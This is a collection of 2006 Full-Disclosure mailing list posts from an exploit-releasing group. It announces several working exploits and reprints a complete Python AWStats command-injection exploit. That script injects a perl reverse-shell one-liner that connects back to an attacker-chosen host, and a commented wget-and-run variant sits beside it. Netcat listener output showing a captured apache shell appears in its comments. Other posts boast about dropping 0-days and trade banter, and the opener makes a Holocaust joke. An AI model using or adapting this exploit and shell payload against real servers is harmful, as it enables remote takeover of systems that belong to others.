[Full-disclosure] [BL4CK] - BL4CK FR1D4Y 2006-07-21
Welcome to the zer0-day haulocaust.
Exploits - Take a step inside our oven.
Welcome to the zer0-day haulocaust.
Exploits - Take a step inside our oven.
Welcome to the zer0-day haulocaust.
Welcome to the zer0-day haulocaust.
...
(0mg, doesn't this silly poem sound familiar?)
Welcome to the first bl4ck fr1d4y. We have deemed this Friday
our first bl4ck fr1d4y of the year. Attached are several
fully functional proof of concepts that for the most part, have
not hit the security community, as well as fresh code for your
eyes.
This is our present to this year's Blackhat/Defcon 2006.
This Fr1d4y's releases:
-=[ Windows DHCP Client Broadcast Attack
Functioning Remote Exploit for MS06-036
by redsand
-=[ MDAC Code Execution in Internet Explorer
Functioning Internet Explorer Exploit for MS06-014
by redsand
-=[ Sendmail 8.13.5 and below Remote Signal Handling exploit
Proof of Concept for the remote signal handling vulnerability
by redsand
-=[ Solaris SPARC TCP Connect-Back Shellcode (with XNOR Encoded Session)
and Client
SPARC Assembly Shellcode - Connect-Back Shell with an encoded tcp
session
by xort
-=[ Cyrus Imapd - POP3D Exploit
Functioning cyrus-imapd pop3d exploit that will bypass VA Randomization.
Target host gentoo linux 2.6.16
by bannedit
Until next time, k33p 1t r34l
This archive can be found at:
http://www.blacksecurity.org/download/61/BL4CK_FR1D4Y_2006-07-21
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Let's Not Forget Whose In Charge
I just wanted to remind everyone how this mailing list USED to be.
Remember when it USED to be better? Cooler? Faster? Stronger? Back when
all those nifty cool 1-day and 0-day exploits were dropped randomly just
so we could watch the security industry scramble to take cover?
Boy THOSE were the days!!!
http://blacksecurity.org
# http://secunia.com/advisories/19969/
# by [EMAIL PROTECTED]
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz
#
# [EMAIL PROTECTED] ~/ $ nc -l -p 31337 -v
[EMAIL PROTECTED]:~$ head -n30 bl4ck_awstats_migrate_cmd_inj.py
#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by [EMAIL PROTECTED]
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz
#
# [EMAIL PROTECTED] ~/ $ nc -l -p 31337 -v
# listening on [any] 31337 ...
# connect to [65.99.197.147] from blacksecurity.org
[65.99.197.147] 53377
# id
# uid=81(apache) gid=81(apache) groups=81(apache)
#
#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by [EMAIL PROTECTED]
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz
#
# [EMAIL PROTECTED] ~/ $ nc -l -p 31337 -v
# listening on [any] 31337 ...
# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
# id
# uid=81(apache) gid=81(apache) groups=81(apache)
#
import sys, socket, base64
import urllib2, urlparse, urllib
# perl 1 line tcp connect-back code
# needs ip & port
cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\'';
class rbawstatsMigrate:
__url = ''
__user = ''
__password = ''
__auth = False
__chost =False
__cport = False
def __init__(self,host=False, ur=False, ps=False, chost=False, cport=False):
if host:
self.__url = host
if ur:
self.__user = ur
if ps:
self.__password = ps
if ur or ps: self.__auth = True
if chost: self.__chost = chost
if cport: self.__cport = cport
url = urlparse.urlsplit(self.__url)
i = url[1].find(';')
if i >= 0:
self.__parsed_host = url[1][:i]
else:
self.__parsed_host = url[1]
def probe(self):
cphost = socket.gethostbyname_ex(self.__chost)
my_cmd = cmd % (cphost[2][0],self.__cport)
url_xpl = { "config": self.__parsed_host,
"migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host)
# "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host)
}
#if self.__url[len(self.__url) -1] != '?':
# url_xpl = '?' + url_xpl
url = self.__url
url_xpl = urllib.urlencode(url_xpl)
try:
req = urllib2.Request(url, url_xpl)
if(self.__auth):
b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1]
req.add_header('Authorization', "Basic %s"% b64str)
req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org";)
req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1')
req.add_header('Accept-Language','en-us')
req.add_header('Accept-Encoding','deflate, gzip')
req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security")
req.add_header('Connection' ,'Keep-Alive')
req.add_header('Cache-Control','no-cache')
q = urllib2.urlopen(req)
except IOError, e:
print "FAILED %s" % e
sys.exit(0)
print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport)
sys.exit(0)
user=False
pas=False
url=False
chst=False
cprt=False
print "[BL4CK] AWStats CMD Injection Exploit by [EMAIL PROTECTED]"
print "http://secunia.com/advisories/19969/";
print "http://blacksecurity.org - f0r my h0mi3s"
argc = len(sys.argv)
if(argc <= 3):
print "USAGE: %s http://host/awstats.pl [username] [password] " % sys.argv[0]
print "\t\* Support 401 HTTP Authentication"
sys.exit(0)
if(argc > 1):
url = sys.argv[1]
if(argc > 2):
chst = sys.argv[2]
if(argc > 3):
cprt = sys.argv[3]
if(argc > 4):
user = sys.argv[4]
if(argc > 5):
pas = sys.argv[5]
red = rbawstatsMigrate(url, user, pas, chst, cprt)
red.probe()
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] info about recent Ms issue
damn.. contex += 1; -redsand c0ntex wrote: On 14/04/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: this is not a vulnerability for MS because the .hlp file is a script file and they believe that's not secured at all, c0ntex just posted a fresh advisory of something wich has been found years ago, disclosed hundred of times, but he looks to have time to loose. Where is the "heap overflow" in Windows Help that has been discussed thousands of times? I never once discussed the scriptable issue with .hlp files because that is not my interest, my interest is in manipulating process execution by overwriting memory. Your english is good enough to talk bollox but obviously not good enough to read. Anyway, 4 more Windows heap overflows coming on their way just awaiting your criticism :-) -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ADVISORY] ~ +Thu Mar 16 14:09:26 EST 2006+ ~ Local Privilege Escalation Vulnerability in ISC BIND
[ADVISORY] ~ +Thu Mar 16 14:09:26 EST 2006+ ~ Local Privilege Escalation Vulnerability in ISC BIND 8===D WORKAROUND There was no identified workarounds. CONTACT redsand [EMAIL PROTECTED] GSAE CEH SSP-CNSA GIPS CAP SSCP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MS06-005 BMP WMPlayer Exploit
Okay, Once again Black Tuesday has come and gone, and the race for exploits begins!! MS06-005 was unsuccessful for me as it seems the exploit environment flops around like a trout out of water. I probably shouldn't be disclosing this since its a non-working exploit but here's something for someone else to work with. I'd really like to see a solution to this. http://blacksecurity.org/~redsand/public/MS06-005/ Cheers! redsand ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BlackWorm technical information
does anyone have a binary they'd like to share ? [EMAIL PROTECTED] wrote: Old Signed by an unknown key: 01/24/06 at 11:35:07 "The worm has an interesting feature. When it infects a computer it opens a web browser on a certain webpage. This increments the counter on that webpage." no much informations about this ? Gadi Evron wrote: Technical information on the worm itself can be found here: http://www.f-secure.com/v-descs/nyxem_e.shtml and http://blogs.securiteam.com/index.php/archives/229 Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . * Unknown Key * 0xA7C69C5F (L) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
like selling all my M$ Excel exploits [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 and me I think most FD members are desesperate of such newcomer comments, you have nothing to say interesting about his work he's doing before you were born. redsand wrote: i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else. Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click "batch build, build" or "rebuild all" code will execute ( calc.exe and notepad.exe used as an example ) What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation." ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ 7 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ9AV6a+LRXunxpxfAQIl+A//XQq/5cyAlFC1SPGGqtQ0dG+S/NwGUzzv Z7ztPO91djMBVqHq1sNKwpwGwvl9KDXANuxl+lSRpW4KaoXIfORFhbO+jFHkkENN mcLVmLVuzDzO9a5RPCSb1NdIvPMSulJCV+4uoZyc45qG1Vw6qNugISnZm8R2CZk+ +V+VqB8cpl34JdL7tfPPn5Gcs4QRJiNcFfFsT0duG1p2EGuLzbvNqgqPcISSL+MZ fNDrbRHk+PpkIz0Z1bxdAt9v/ijJ/c+vWASa0jO9tPtUEdsYfJYFC2LOUpw659rS DAiMxxKPPt2tFR7n4PyIridzrYRNd9UrwbMsiTaD8aOIIZHmhac3+vfVbOv+zOEz L2s8Sv5FanlsEI/zcK5DCSL6aRAVY98Uhq796qFrwAGkmCP1umfQGb/dFn+hmqd/ 4WwA/Qzv9vBBRqKUssiASwock5s/Vpb9y9OdPjkcN1QYVOm1RxPaA8uFKRfZ34v1 sFGzefTOo4xYFuuPuXB+Uz2/yDhvrPuqsiQdvtz7jQ56NxTQmxuLN2fy5Uh1Pc7L 1bnvW5FSFAboD95uaIfFvzu5oclQnXLJBgCjQCVjhXR1FUX/vOc+8ydcF5dUiLkk +iOMKvOvyzgGwuXR8z6tTXkPpEtJkb4xSej/JFHHpcUwSK/teUlHE6eODczAZtop S4l5HkauGb0= =Yi5I -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else. Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click "batch build, build" or "rebuild all" code will execute ( calc.exe and notepad.exe used as an example ) What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation." ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
